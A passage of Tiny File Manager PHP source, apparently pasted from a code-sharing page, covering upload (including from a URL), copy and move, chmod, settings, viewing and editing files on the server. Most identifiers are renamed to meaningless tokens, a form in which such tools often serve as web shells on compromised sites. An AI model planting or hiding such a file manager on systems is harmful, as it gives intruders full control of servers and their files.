Token."),'error');}$h110=FM_ROOT_PATH;if(FM_PATH!=''){$h110.='/'.FM_PATH;}$b98=$_POST['chmod'];$b98=s19($b98);$b98=str_replace('/','',$b98);if($b98==''||(!is_file($h110.'/'.$b98)&&!is_dir($h110.'/'.$b98))){i29(z57('File not found'),'error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}$z205=0;if(!empty($_POST['ur'])){$z205|=0400;}if(!empty($_POST['uw'])){$z205|=0200;}if(!empty($_POST['ux'])){$z205|=0100;}if(!empty($_POST['gr'])){$z205|=0040;}if(!empty($_POST['gw'])){$z205|=0020;}if(!empty($_POST['gx'])){$z205|=0010;}if(!empty($_POST['or'])){$z205|=0004;}if(!empty($_POST['ow'])){$z205|=0002;}if(!empty($_POST['ox'])){$z205|=0001;}if(@chmod($h110.'/'.$b98,$z205)){i29(z57('Permissions changed'));}else{i29(z57('Permissions not changed'),'error');}$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}$h110=FM_ROOT_PATH;if(FM_PATH!=''){$h110.='/'.FM_PATH;}if(!is_dir($h110)){b17(FM_SELF_URL.'?p=');}$f206=l20(FM_PATH);$x207=is_readable($h110)?scandir($h110):array();$q208=array();$t171=array();$r209=array_slice(explode("/",$h110),-1)[0];if(is_array($x207)&&c21($r209)){foreach($x207 as $b98){if($b98=='.'||$b98=='..'){continue;}if(!FM_SHOW_HIDDEN&&substr($b98,0,1)==='.'){continue;}$y190=$h110.'/'.$b98;if(@is_file($y190)&&c21($b98)){$t171[]=$b98;}elseif(@is_dir($y190)&&$b98!='.'&&$b98!='..'&&c21($b98)){$q208[]=$b98;}}}if(!empty($t171)){natcasesort($t171);}if(!empty($q208)){natcasesort($q208);}if(isset($_GET['upload'])&&!FM_READONLY){v55();b51(FM_PATH);function d4(){$x210=explode(',',FM_UPLOAD_EXTENSION);if(FM_UPLOAD_EXTENSION&&$x210){array_walk($x210,function(&$h211){$h211=".$h211";});return x5(',',$x210);}return '';}?>
  60.     <?php m7('css-dropzone');?>
  61.     <div class="path">
  62.  
  63.         <div class="card mb-2 fm-upload-wrapper <?php echo x44();?>">
  64.             <div class="card-header">
  65.                 <ul class="nav nav-tabs card-header-tabs">
  66.                     <li class="nav-item">
  67.                         <a class="nav-link active" href="#fileUploader" data-target="#fileUploader"><i class="fa fa-arrow-circle-o-up"></i> <?php echo z57('UploadingFiles')?></a>
  68.                     </li>
  69.                     <li class="nav-item">
  70.                         <a class="nav-link" href="#urlUploader" class="js-url-upload" data-target="#urlUploader"><i class="fa fa-link"></i> <?php echo z57('Upload from URL')?></a>
  71.                     </li>
  72.                 </ul>
  73.             </div>
  74.             <div class="card-body">
  75.                 <p class="card-text">
  76.                     <a href="?p=<?php echo FM_PATH ?>" class="float-right"><i class="fa fa-chevron-circle-left go-back"></i> <?php echo z57('Back')?></a>
  77.                     <strong><?php echo z57('DestinationFolder')?></strong>: <?php echo w27(h31(FM_PATH))?>
  78.                 </p>
  79.  
  80.                 <form action="<?php echo htmlspecialchars(FM_SELF_URL).'?p='.w27(FM_PATH)?>" class="dropzone card-tabs-container" id="fileUploader" enctype="multipart/form-data">
  81.                     <input type="hidden" name="p" value="<?php echo w27(FM_PATH)?>">
  82.                     <input type="hidden" name="fullpath" id="fullpath" value="<?php echo w27(FM_PATH)?>">
  83.                     <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>">
  84.                     <div class="fallback">
  85.                         <input name="file" type="file" multiple/>
  86.                     </div>
  87.                 </form>
  88.  
  89.                 <div class="upload-url-wrapper card-tabs-container hidden" id="urlUploader">
  90.                     <form id="js-form-url-upload" class="row row-cols-lg-auto g-3 align-items-center" onsubmit="return upload_from_url(this);" method="POST" action="">
  91.                         <input type="hidden" name="type" value="upload" aria-label="hidden" aria-hidden="true">
  92.                         <input type="url" placeholder="URL" name="uploadurl" required class="form-control" style="width: 80%">
  93.                         <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>">
  94.                         <button type="submit" class="btn btn-primary ms-3"><?php echo z57('Upload')?></button>
  95.                         <div class="lds-facebook"><div></div><div></div><div></div></div>
  96.                     </form>
  97.                     <div id="js-url-upload__list" class="col-9 mt-3"></div>
  98.                 </div>
  99.             </div>
  100.         </div>
  101.     </div>
  102.     <?php m7('js-dropzone');?>
  103.     <script>
  104.         Dropzone.options.fileUploader = {
  105.             chunking: true,
  106.             chunkSize: <?php echo UPLOAD_CHUNK_SIZE;?>,
  107.             forceChunking: true,
  108.             retryChunks: true,
  109.             retryChunksLimit: 3,
  110.             parallelUploads: 1,
  111.             parallelChunkUploads: false,
  112.             timeout: 120000,
  113.             maxFilesize: "<?php echo MAX_UPLOAD_SIZE;?>",
  114.             acceptedFiles : "<?php echo d4()?>",
  115.             init: function () {
  116.                 this.on("sending", function (file, xhr, formData) {
  117.                     let _path = (file.fullPath) ? file.fullPath : file.name;
  118.                     document.getElementById("fullpath").value = _path;
  119.                     xhr.ontimeout = (function() {
  120.                         toast('Error: Server Timeout');
  121.                     });
  122.                 }).on("success", function (res) {
  123.                     let _response = JSON.parse(res.xhr.response);
  124.  
  125.                     if(_response.status == "error") {
  126.                         toast(_response.info);
  127.                     }
  128.                 }).on("error", function(file, response) {
  129.                     toast(response);
  130.                 });
  131.             }
  132.         }
  133.     </script>
  134.     <?php t56();exit;}if(isset($_POST['copy'])&&!FM_READONLY){$i212=isset($_POST['file'])?$_POST['file']:null;if(!is_array($i212)||empty($i212)){i29(z57('Nothing selected'),'alert');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}v55();b51(FM_PATH);?>
  135.     <div class="path">
  136.         <div class="card <?php echo x44();?>">
  137.             <div class="card-header">
  138.                 <h6><?php echo z57('Copying')?></h6>
  139.             </div>
  140.             <div class="card-body">
  141.                 <form action="" method="post">
  142.                     <input type="hidden" name="p" value="<?php echo w27(FM_PATH)?>">
  143.                     <input type="hidden" name="finish" value="1">
  144.                     <?php foreach($i212 as $k213){echo '<input type="hidden" name="file[]" value="'.w27($k213).'">'.PHP_EOL;}?>
  145.                     <p class="break-word"><strong><?php echo z57('Files')?></strong>: <b><?php echo x5('</b>, <b>',$i212)?></b></p>
  146.                     <p class="break-word"><strong><?php echo z57('SourceFolder')?></strong>: <?php echo w27(h31(FM_ROOT_PATH.'/'.FM_PATH))?><br>
  147.                         <label for="inp_copy_to"><strong><?php echo z57('DestinationFolder')?></strong>:</label>
  148.                         <?php echo FM_ROOT_PATH ?>/<input type="text" name="copy_to" id="inp_copy_to" value="<?php echo w27(FM_PATH)?>">
  149.                     </p>
  150.                     <p class="custom-checkbox custom-control"><input type="checkbox" name="move" value="1" id="js-move-files" class="custom-control-input"><label for="js-move-files" class="custom-control-label ms-2"> <?php echo z57('Move')?></label></p>
  151.                     <p>
  152.                         <b><a href="?p=<?php echo urlencode(FM_PATH)?>" class="btn btn-outline-danger"><i class="fa fa-times-circle"></i> <?php echo z57('Cancel')?></a></b>&nbsp;
  153.                         <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>">
  154.                         <button type="submit" class="btn btn-success"><i class="fa fa-check-circle"></i> <?php echo z57('Copy')?></button>
  155.                     </p>
  156.                 </form>
  157.             </div>
  158.         </div>
  159.     </div>
  160.     <?php t56();exit;}if(isset($_GET['copy'])&&!isset($_GET['finish'])&&!FM_READONLY){$i157=$_GET['copy'];$i157=s19($i157);if($i157==''||!file_exists(FM_ROOT_PATH.'/'.$i157)){i29(z57('File not found'),'error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}v55();b51(FM_PATH);?>
  161.     <div class="path">
  162.         <p><b>Copying</b></p>
  163.         <p class="break-word">
  164.             <strong>Source path:</strong> <?php echo w27(h31(FM_ROOT_PATH.'/'.$i157))?><br>
  165.             <strong>Destination folder:</strong> <?php echo w27(h31(FM_ROOT_PATH.'/'.FM_PATH))?>
  166.         </p>
  167.         <p>
  168.             <b><a href="?p=<?php echo urlencode(FM_PATH)?>&amp;copy=<?php echo urlencode($i157)?>&amp;finish=1"><i class="fa fa-check-circle"></i> Copy</a></b> &nbsp;
  169.             <b><a href="?p=<?php echo urlencode(FM_PATH)?>&amp;copy=<?php echo urlencode($i157)?>&amp;finish=1&amp;move=1"><i class="fa fa-check-circle"></i> Move</a></b> &nbsp;
  170.             <b><a href="?p=<?php echo urlencode(FM_PATH)?>" class="text-danger"><i class="fa fa-times-circle"></i> Cancel</a></b>
  171.         </p>
  172.         <p><i><?php echo z57('Select folder')?></i></p>
  173.         <ul class="folders break-word">
  174.             <?php if($f206!==false){?>
  175.                 <li><a href="?p=<?php echo urlencode($f206)?>&amp;copy=<?php echo urlencode($i157)?>"><i class="fa fa-chevron-circle-left"></i> ..</a></li>
  176.                 <?php }foreach($q208 as $l172){?>
  177.                 <li>
  178.                     <a href="?p=<?php echo urlencode(trim(FM_PATH.'/'.$l172,'/'))?>&amp;copy=<?php echo urlencode($i157)?>"><i class="fa fa-folder-o"></i> <?php echo h31($l172)?></a></li>
  179.                 <?php }?>
  180.         </ul>
  181.     </div>
  182.     <?php t56();exit;}if(isset($_GET['settings'])&&!FM_READONLY){v55();b51(FM_PATH);global $j87,$x89,$e95;?>
  183.  
  184.     <div class="col-md-8 offset-md-2 pt-3">
  185.         <div class="card mb-2 <?php echo x44();?>">
  186.             <h6 class="card-header d-flex justify-content-between">
  187.                 <span><i class="fa fa-cog"></i>  <?php echo z57('Settings')?></span>
  188.                 <a href="?p=<?php echo FM_PATH ?>" class="text-danger"><i class="fa fa-times-circle-o"></i> <?php echo z57('Cancel')?></a>
  189.             </h6>
  190.             <div class="card-body">
  191.                 <form id="js-settings-form" action="" method="post" data-type="ajax" onsubmit="return save_settings(this)">
  192.                     <input type="hidden" name="type" value="settings" aria-label="hidden" aria-hidden="true">
  193.                     <div class="form-group row">
  194.                         <label for="js-language" class="col-sm-3 col-form-label"><?php echo z57('Language')?></label>
  195.                         <div class="col-sm-5">
  196.                             <select class="form-select" id="js-language" name="js-language">
  197.                                 <?php function y6($x214){global $x89;return($x89==$x214)?'selected':'';}foreach($e95 as $p215=>$q216){echo"<option value='$p215' ".y6($p215).">$q216</option>";}?>
  198.                             </select>
  199.                         </div>
  200.                     </div>
  201.                     <div class="mt-3 mb-3 row ">
  202.                         <label for="js-error-report" class="col-sm-3 col-form-label"><?php echo z57('ErrorReporting')?></label>
  203.                         <div class="col-sm-9">
  204.                             <div class="form-check form-switch">
  205.                               <input class="form-check-input" type="checkbox" role="switch" id="js-error-report" name="js-error-report" value="true" <?php echo $s92?'checked':'';?> />
  206.                             </div>
  207.                         </div>
  208.                     </div>
  209.  
  210.                     <div class="mb-3 row">
  211.                         <label for="js-show-hidden" class="col-sm-3 col-form-label"><?php echo z57('ShowHiddenFiles')?></label>
  212.                         <div class="col-sm-9">
  213.                             <div class="form-check form-switch">
  214.                               <input class="form-check-input" type="checkbox" role="switch" id="js-show-hidden" name="js-show-hidden" value="true" <?php echo $m91?'checked':'';?> />
  215.                             </div>
  216.                         </div>
  217.                     </div>
  218.  
  219.                     <div class="mb-3 row">
  220.                         <label for="js-hide-cols" class="col-sm-3 col-form-label"><?php echo z57('HideColumns')?></label>
  221.                         <div class="col-sm-9">
  222.                             <div class="form-check form-switch">
  223.                               <input class="form-check-input" type="checkbox" role="switch" id="js-hide-cols" name="js-hide-cols" value="true" <?php echo $a93?'checked':'';?> />
  224.                             </div>
  225.                         </div>
  226.                     </div>
  227.  
  228.                     <div class="mb-3 row">
  229.                         <label for="js-3-1" class="col-sm-3 col-form-label"><?php echo z57('Theme')?></label>
  230.                         <div class="col-sm-5">
  231.                             <select class="form-select w-100" id="js-3-0" name="js-theme-3">
  232.                                 <option value='light' <?php if($a94=="light"){echo "selected";}?>><?php echo z57('light')?></option>
  233.                                 <option value='dark' <?php if($a94=="dark"){echo "selected";}?>><?php echo z57('dark')?></option>
  234.                             </select>
  235.                         </div>
  236.                     </div>
  237.  
  238.                     <div class="mb-3 row">
  239.                         <div class="col-sm-10">
  240.                             <button type="submit" class="btn btn-success"> <i class="fa fa-check-circle"></i> <?php echo z57('Save');?></button>
  241.                         </div>
  242.                     </div>
  243.  
  244.                 </form>
  245.             </div>
  246.         </div>
  247.     </div>
  248.     <?php t56();exit;}if(isset($_GET['help'])){v55();b51(FM_PATH);global $j87,$x89;?>
  249.  
  250.     <div class="col-md-8 offset-md-2 pt-3">
  251.         <div class="card mb-2 <?php echo x44();?>">
  252.             <h6 class="card-header d-flex justify-content-between">
  253.                 <span><i class="fa fa-exclamation-circle"></i> <?php echo z57('Help')?></span>
  254.                 <a href="?p=<?php echo FM_PATH ?>" class="text-danger"><i class="fa fa-times-circle-o"></i> <?php echo z57('Cancel')?></a>
  255.             </h6>
  256.             <div class="card-body">
  257.                 <div class="row">
  258.                     <div class="col-xs-12 col-sm-6">
  259.                         <p><h3><a href="https://github.com/prasathmani/tinyfilemanager" target="_blank" class="app-v-title"> Tiny File Manager <?php echo VERSION;?></a></h3></p>
  260.                         <p>Author: Prasath Mani</p>
  261.                         <p>Mail Us: <a href="mailto:[email protected]">ccpprogrammers[at]gmail.com</a> </p>
  262.                     </div>
  263.                     <div class="col-xs-12 col-sm-6">
  264.                         <div class="card">
  265.                             <ul class="list-group list-group-flush">
  266.                                 <li class="list-group-item"><a href="https://github.com/prasathmani/tinyfilemanager/wiki" target="_blank"><i class="fa fa-question-circle"></i> <?php echo z57('Help Documents')?> </a> </li>
  267.                                 <li class="list-group-item"><a href="https://github.com/prasathmani/tinyfilemanager/issues" target="_blank"><i class="fa fa-bug"></i> <?php echo z57('Report Issue')?></a></li>
  268.                                 <?php if(!FM_READONLY){?>
  269.                                 <li class="list-group-item"><a href="javascript:show_new_pwd();"><i class="fa fa-lock"></i> <?php echo z57('Generate new password hash')?></a></li>
  270.                                 <?php }?>
  271.                             </ul>
  272.                         </div>
  273.                     </div>
  274.                 </div>
  275.                 <div class="row js-new-pwd hidden mt-2">
  276.                     <div class="col-12">
  277.                         <form class="form-inline" onsubmit="return new_password_hash(this)" method="POST" action="">
  278.                             <input type="hidden" name="type" value="pwdhash" aria-label="hidden" aria-hidden="true">
  279.                             <div class="form-group mb-2">
  280.                                 <label for="staticEmail2"><?php echo z57('Generate new password hash')?></label>
  281.                             </div>
  282.                             <div class="form-group mx-sm-3 mb-2">
  283.                                 <label for="inputPassword2" class="sr-only"><?php echo z57('Password')?></label>
  284.                                 <input type="text" class="form-control btn-sm" id="inputPassword2" name="inputPassword2" placeholder="<?php echo z57('Password')?>" required>
  285.                             </div>
  286.                             <button type="submit" class="btn btn-success btn-sm mb-2"><?php echo z57('Generate')?></button>
  287.                         </form>
  288.                         <textarea class="form-control" rows="2" readonly id="js-pwd-result"></textarea>
  289.                     </div>
  290.                 </div>
  291.             </div>
  292.         </div>
  293.     </div>
  294.     <?php t56();exit;}if(isset($_GET['view'])){$b98=$_GET['view'];$b98=s19($b98,false);$b98=str_replace('/','',$b98);if($b98==''||!is_file($h110.'/'.$b98)||in_array($b98,$GLOBALS['exclude_items'])){i29(z57('File not found'),'error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}v55();b51(FM_PATH);$y217=FM_ROOT_URL.h31((FM_PATH!=''?'/'.FM_PATH:'').'/'.$b98);$c112=$h110.'/'.$b98;$w144=strtolower(pathinfo($c112,PATHINFO_EXTENSION));$n218=o16($c112);$j219=k23($c112);$c220=o24($j219);$o221=false;$f222=false;$v223=false;$e224=false;$r225=false;$j226=false;$o227=false;$f228='File';$u229=false;$l230='';$l77=strtolower(FM_DOC_VIEWER);if($l77&&$l77!=='false'&&in_array($w144,p40())){$o227=true;}elseif($w144=='zip'||$w144=='tar'){$o221=true;$f228='Archive';$u229=w26($c112,$w144);}elseif(in_array($w144,m34())){$v223=true;$f228='Image';}elseif(in_array($w144,w36())){$e224=true;$f228='Audio';}elseif(in_array($w144,u35())){$r225=true;$f228='Video';}elseif(in_array($w144,v37())||substr($n218,0,4)=='text'||in_array($n218,r38())){$j226=true;$l230=file_get_contents($c112);}?>
  295.     <div class="row">
  296.         <div class="col-12">
  297.             <p class="break-word"><b><?php echo z57($f228)?> "<?php echo w27(h31($b98))?>"</b></p>
  298.             <p class="break-word">
  299.                 <strong>Full path:</strong> <?php echo w27(h31($c112))?><br>
  300.                 <strong>File size:</strong> <?php echo($j219<=1000)?"$j219 bytes":$c220;?><br>
  301.                 <strong>MIME-type:</strong> <?php echo $n218 ?><br>
  302.                 <?php if(($o221||$f222)&&$u229!==false){$s231=0;$l232=0;$y233=0;foreach($u229 as $d234){if(!$d234['folder']){$s231++;}$l232+=$d234['compressed_size'];$y233+=$d234['filesize'];}?>
  303.                     <?php echo z57('Files in archive')?>: <?php echo $s231 ?><br>
  304.                     <?php echo z57('Total size')?>: <?php echo o24($y233)?><br>
  305.                     <?php echo z57('Size in archive')?>: <?php echo o24($l232)?><br>
  306.                     <?php echo z57('Compression')?>: <?php echo round(($l232/max($y233,1))*100)?>%<br>
  307.                     <?php }if($v223){$i235=getimagesize($c112);echo z57('Image sizes').': '.(isset($i235[0])?$i235[0]:'0').' x '.(isset($i235[1])?$i235[1]:'0').'<br>';}if($j226){$d236=q30($l230);if(function_exists('iconv')){if(!$d236){$l230=iconv(FM_ICONV_INPUT_ENC,'UTF-8//IGNORE',$l230);}}echo '<strong>'.z57('Charset').':</strong> '.($d236?'utf-8':'8 bit').'<br>';}?>
  308.             </p>
  309.             <div class="d-flex align-items-center mb-3">
  310.                 <form method="post" class="d-inline ms-2" action="?p=<?php echo urlencode(FM_PATH)?>&amp;dl=<?php echo urlencode($b98)?>">
  311.                     <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>">
  312.                     <button type="submit" class="btn btn-link text-decoration-none fw-bold p-0"><i class="fa fa-cloud-download"></i> <?php echo z57('Download')?></button> &nbsp;
  313.                 </form>
  314.                 <b class="ms-2"><a href="<?php echo w27($y217)?>" target="_blank"><i class="fa fa-external-link-square"></i> <?php echo z57('Open')?></a></b>
  315.                 <?php if(!FM_READONLY&&($o221||$f222)&&$u229!==false){$r237=pathinfo($c112,PATHINFO_FILENAME);?>
  316.                     <form method="post" class="d-inline ms-2">
  317.                         <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>">
  318.                         <input type="hidden" name="unzip" value="<?php echo urlencode($b98);?>">
  319.                         <button type="submit" class="btn btn-link text-decoration-none fw-bold p-0" style="font-size: 14px;"><i class="fa fa-check-circle"></i> <?php echo z57('UnZip')?></button>
  320.                     </form>&nbsp;
  321.                     <form method="post" class="d-inline ms-2">
  322.                         <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>">
  323.                         <input type="hidden" name="unzip" value="<?php echo urlencode($b98);?>">
  324.                         <input type="hidden" name="tofolder" value="1">
  325.                         <button type="submit" class="btn btn-link text-decoration-none fw-bold p-0" style="font-size: 14px;" title="UnZip to <?php echo w27($r237)?>"><i class="fa fa-check-circle"></i> <?php echo z57('UnZipToFolder')?></button>
  326.                     </form>&nbsp;
  327.                     <?php }if($j226&&!FM_READONLY){?>
  328.                     <b class="ms-2"><a href="?p=<?php echo urlencode(trim(FM_PATH))?>&amp;edit=<?php echo urlencode($b98)?>" class="edit-file"><i class="fa fa-pencil-square"></i> <?php echo z57('Edit')?>
  329.                         </a></b> &nbsp;
  330.                     <b class="ms-2"><a href="?p=<?php echo urlencode(trim(FM_PATH))?>&amp;edit=<?php echo urlencode($b98)?>&env=ace"
  331.                             class="edit-file"><i class="fa fa-pencil-square-o"></i> <?php echo z57('AdvancedEditor')?>
  332.                         </a></b> &nbsp;
  333.                 <?php }?>
  334.                 <b class="ms-2"><a href="?p=<?php echo urlencode(FM_PATH)?>"><i class="fa fa-chevron-circle-left go-back"></i> <?php echo z57('Back')?></a></b>
  335.             </div>
  336.             <?php if($o227){if($l77=='google'){echo '<iframe src="https://docs.google.com/viewer?embedded=true&hl=en&url='.w27($y217).'" frameborder="no" style="width:100%;min-height:460px"></iframe>';}else if($l77=='microsoft'){echo '<iframe src="https://view.officeapps.live.com/op/embed.aspx?src='.w27($y217).'" frameborder="no" style="width:100%;min-height:460px"></iframe>';}}elseif($o221){if($u229!==false){echo '<code class="maxheight">';foreach($u229 as $d234){if($d234['folder']){echo '<b>'.w27($d234['name']).'</b><br>';}else{echo $d234['name'].' ('.o24($d234['filesize']).')<br>';}}echo '</code>';}else{echo '<p>'.z57('Error while fetching archive info').'</p>';}}elseif($v223){if(in_array($w144,array('gif','jpg','jpeg','png','bmp','ico','svg','webp','avif'))){echo '<p><img src="'.w27($y217).'" alt="image" class="preview-img-container" class="preview-img"></p>';}}elseif($e224){echo '<p><audio src="'.w27($y217).'" controls preload="metadata"></audio></p>';}elseif($r225){echo '<div class="preview-video"><video src="'.w27($y217).'" width="640" height="360" controls preload="metadata"></video></div>';}elseif($j226){if(FM_USE_HIGHLIGHTJS){$f238=array('shtml'=>'xml','htaccess'=>'apache','phtml'=>'php','lock'=>'json','svg'=>'xml',);$b239=isset($f238[$w144])?'lang-'.$f238[$w144]:'lang-'.$w144;if(empty($w144)||in_array(strtolower($b98),v39())||preg_match('#\.min\.(css|js)$#i',$b98)){$b239='nohighlight';}$l230='<pre class="with-hljs"><code class="'.$b239.'">'.w27($l230).'</code></pre>';}elseif(in_array($w144,array('php','php4','php5','phtml','phps'))){$l230=highlight_string($l230,true);}else{$l230='<pre>'.w27($l230).'</pre>';}echo $l230;}?>
  337.         </div>
  338.     </div>
  339.     <?php t56();exit;}if(isset($_GET['edit'])&&!FM_READONLY){$b98=$_GET['edit'];$b98=s19($b98,false);$b98=str_replace('/','',$b98);if($b98==''||!is_file($h110.'/'.$b98)||in_array($b98,$GLOBALS['exclude_items'])){i29(z57('File not found'),'error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}$m240=' : <i><b>'.$b98.'</b></i>';header('X-XSS-Protection:0');v55();b51(FM_PATH);$y217=FM_ROOT_URL.h31((FM_PATH!=''?'/'.FM_PATH:'').'/'.$b98);$c112=$h110.'/'.$b98;$o241=true;if(isset($_GET['env'])){if($_GET['env']=="ace"){$o241=false;}}if(isset($_POST['savedata'])){$v113=$_POST['savedata'];$i114=fopen($c112,"w");@fwrite($i114,$v113);fclose($i114);i29(z57('File Saved Successfully'));}$w144=strtolower(pathinfo($c112,PATHINFO_EXTENSION));$n218=o16($c112);$c220=filesize($c112);$j226=false;$l230='';if(in_array($w144,v37())||substr($n218,0,4)=='text'||in_array($n218,r38())){$j226=true;$l230=file_get_contents($c112);}?>
  340.     <div class="path">
  341.         <div class="row">
  342.             <div class="col-xs-12 col-sm-5 col-lg-6 pt-1">
  343.                 <div class="btn-toolbar" role="toolbar">
  344.                     <?php if(!$o241){?>
  345.                         <div class="btn-group js-ace-toolbar">
  346.                             <button data-cmd="none" data-option="fullscreen" class="btn btn-sm btn-outline-secondary" id="js-ace-fullscreen" title="<?php echo z57('Fullscreen')?>"><i class="fa fa-expand" title="<?php echo z57('Fullscreen')?>"></i></button>
  347.                             <button data-cmd="find" class="btn btn-sm btn-outline-secondary" id="js-ace-search" title="<?php echo z57('Search')?>"><i class="fa fa-search" title="<?php echo z57('Search')?>"></i></button>
  348.                             <button data-cmd="undo" class="btn btn-sm btn-outline-secondary" id="js-ace-undo" title="<?php echo z57('Undo')?>"><i class="fa fa-undo" title="<?php echo z57('Undo')?>"></i></button>
  349.                             <button data-cmd="redo" class="btn btn-sm btn-outline-secondary" id="js-ace-redo" title="<?php echo z57('Redo')?>"><i class="fa fa-repeat" title="<?php echo z57('Redo')?>"></i></button>
  350.                             <button data-cmd="none" data-option="wrap" class="btn btn-sm btn-outline-secondary" id="js-ace-wordWrap" title="<?php echo z57('Word Wrap')?>"><i class="fa fa-text-width" title="<?php echo z57('Word Wrap')?>"></i></button>
  351.                             <select id="js-ace-mode" data-type="mode" title="<?php echo z57('Select Document Type')?>" class="btn-outline-secondary border-start-0 d-none d-md-block"><option>-- <?php echo z57('Select Mode')?> --</option></select>
  352.                             <select id="js-ace-theme" data-type="theme" title="<?php echo z57('Select Theme')?>" class="btn-outline-secondary border-start-0 d-none d-lg-block"><option>-- <?php echo z57('Select Theme')?> --</option></select>
  353.                             <select id="js-ace-fontSize" data-type="fontSize" title="<?php echo z57('Select Font Size')?>" class="btn-outline-secondary border-start-0 d-none d-lg-block"><option>-- <?php echo z57('Select Font Size')?> --</option></select>
  354.                         </div>
  355.                     <?php }?>
  356.                 </div>
  357.             </div>
  358.             <div class="edit-file-actions col-xs-12 col-sm-7 col-lg-6 text-end pt-1">
  359.                 <a title="<?php echo z57('Back')?>" class="btn btn-sm btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH))?>&amp;view=<?php echo urlencode($b98)?>"><i class="fa fa-reply-all"></i> <?php echo z57('Back')?></a>
  360.                 <a title="<?php echo z57('BackUp')?>" class="btn btn-sm btn-outline-primary" href="javascript:void(0);" onclick="backup('<?php echo urlencode(trim(FM_PATH))?>','<?php echo urlencode($b98)?>')"><i class="fa fa-database"></i> <?php echo z57('BackUp')?></a>
  361.                 <?php if($j226){?>
  362.                     <?php if($o241){?>
  363.                         <a title="Advanced" class="btn btn-sm btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH))?>&amp;edit=<?php echo urlencode($b98)?>&amp;env=ace"><i class="fa fa-pencil-square-o"></i> <?php echo z57('AdvancedEditor')?></a>
  364.                         <button type="button" class="btn btn-sm btn-success" name="Save" data-url="<?php echo w27($y217)?>" onclick="edit_save(this,'nrl')"><i class="fa fa-floppy-o"></i> Save
  365.                         </button>
  366.                     <?php }else{?>
  367.                         <a title="Plain Editor" class="btn btn-sm btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH))?>&amp;edit=<?php echo urlencode($b98)?>"><i class="fa fa-text-height"></i> <?php echo z57('NormalEditor')?></a>
  368.                         <button type="button" class="btn btn-sm btn-success" name="Save" data-url="<?php echo w27($y217)?>" onclick="edit_save(this,'ace')"><i class="fa fa-floppy-o"></i> <?php echo z57('Save')?>
  369.                         </button>
  370.                     <?php }?>
  371.                 <?php }?>
  372.             </div>
  373.         </div>
  374.         <?php if($j226&&$o241){echo '<textarea class="mt-2" id="normal-editor" rows="33" cols="120" style="width: 99.5%;">'.htmlspecialchars($l230).'</textarea>';echo '<script>document.addEventListener("keydown", function(e) {if ((window.navigator.platform.match("Mac") ? e.metaKey : e.ctrlKey)  && e.keyCode == 83) { e.preventDefault();edit_save(this,"nrl");}}, false);</script>';}elseif($j226){echo '<div id="editor" contenteditable="true">'.htmlspecialchars($l230).'</div>';}else{i29(z57('FILE EXTENSION HAS NOT SUPPORTED'),'error');}?>
  375.     </div>
  376.     <?php t56();exit;}if(isset($_GET['chmod'])&&!FM_READONLY&&!FM_IS_WIN){$b98=$_GET['chmod'];$b98=s19($b98);$b98=str_replace('/','',$b98);if($b98==''||(!is_file($h110.'/'.$b98)&&!is_dir($h110.'/'.$b98))){i29(z57('File not found'),'error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}v55();b51(FM_PATH);$y217=FM_ROOT_URL.(FM_PATH!=''?'/'.FM_PATH:'').'/'.$b98;$c112=$h110.'/'.$b98;$z205=fileperms($h110.'/'.$b98);?>
  377.     <div class="path">
  378.         <div class="card mb-2 <?php echo x44();?>">
  379.             <h6 class="card-header">
  380.                 <?php echo z57('ChangePermissions')?>
  381.             </h6>
  382.             <div class="card-body">
  383.                 <p class="card-text">
  384.                     Full path: <?php echo $c112 ?><br>
  385.                 </p>
  386.                 <form action="" method="post">
  387.                     <input type="hidden" name="p" value="<?php echo w27(FM_PATH)?>">
  388.                     <input type="hidden" name="chmod" value="<?php echo w27($b98)?>">
  389.  
  390.                     <table class="table compact-table <?php echo x44();?>">
  391.                         <tr>
  392.                             <td></td>
  393.                             <td><b><?php echo z57('Owner')?></b></td>
  394.                             <td><b><?php echo z57('Group')?></b></td>
  395.                             <td><b><?php echo z57('Other')?></b></td>
  396.                         </tr>
  397.                         <tr>
  398.                             <td style="text-align: right"><b><?php echo z57('Read')?></b></td>
  399.                             <td><label><input type="checkbox" name="ur" value="1"<?php echo($z205&00400)?' checked':'' ?>></label></td>
  400.                             <td><label><input type="checkbox" name="gr" value="1"<?php echo($z205&00040)?' checked':'' ?>></label></td>
  401.                             <td><label><input type="checkbox" name="or" value="1"<?php echo($z205&00004)?' checked':'' ?>></label></td>
  402.                         </tr>
  403.                         <tr>
  404.                             <td style="text-align: right"><b><?php echo z57('Write')?></b></td>
  405.                             <td><label><input type="checkbox" name="uw" value="1"<?php echo($z205&00200)?' checked':'' ?>></label></td>
  406.                             <td><label><input type="checkbox" name="gw" value="1"<?php echo($z205&00020)?' checked':'' ?>></label></td>
  407.                             <td><label><input type="checkbox" name="ow" value="1"<?php echo($z205&00002)?' checked':'' ?>></label></td>
  408.                         </tr>
  409.                         <tr>
  410.                             <td style="text-align: right"><b><?php echo z57('Execute')?></b></td>
  411.                             <td><label><input type="checkbox" name="ux" value="1"<?php echo($z205&00100)?' checked':'' ?>></label></td>
  412.                             <td><label><input type="checkbox" name="gx" value="1"<?php echo($z205&00010)?' checked':'' ?>></label></td>
  413.                             <td><label><input type="checkbox" name="ox" value="1"<?php echo($z205&00001)?' checked':'' ?>></label></td>
  414.                         </tr>
  415.                     </table>
  416.  
  417.                     <p>
  418.                        <input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>">
  419.                         <b><a href="?p=<?php echo urlencode(FM_PATH)?>" class="btn btn-outline-primary"><i class="fa fa-times-circle"></i> <?php echo z57('Cancel')?></a></b>&nbsp;
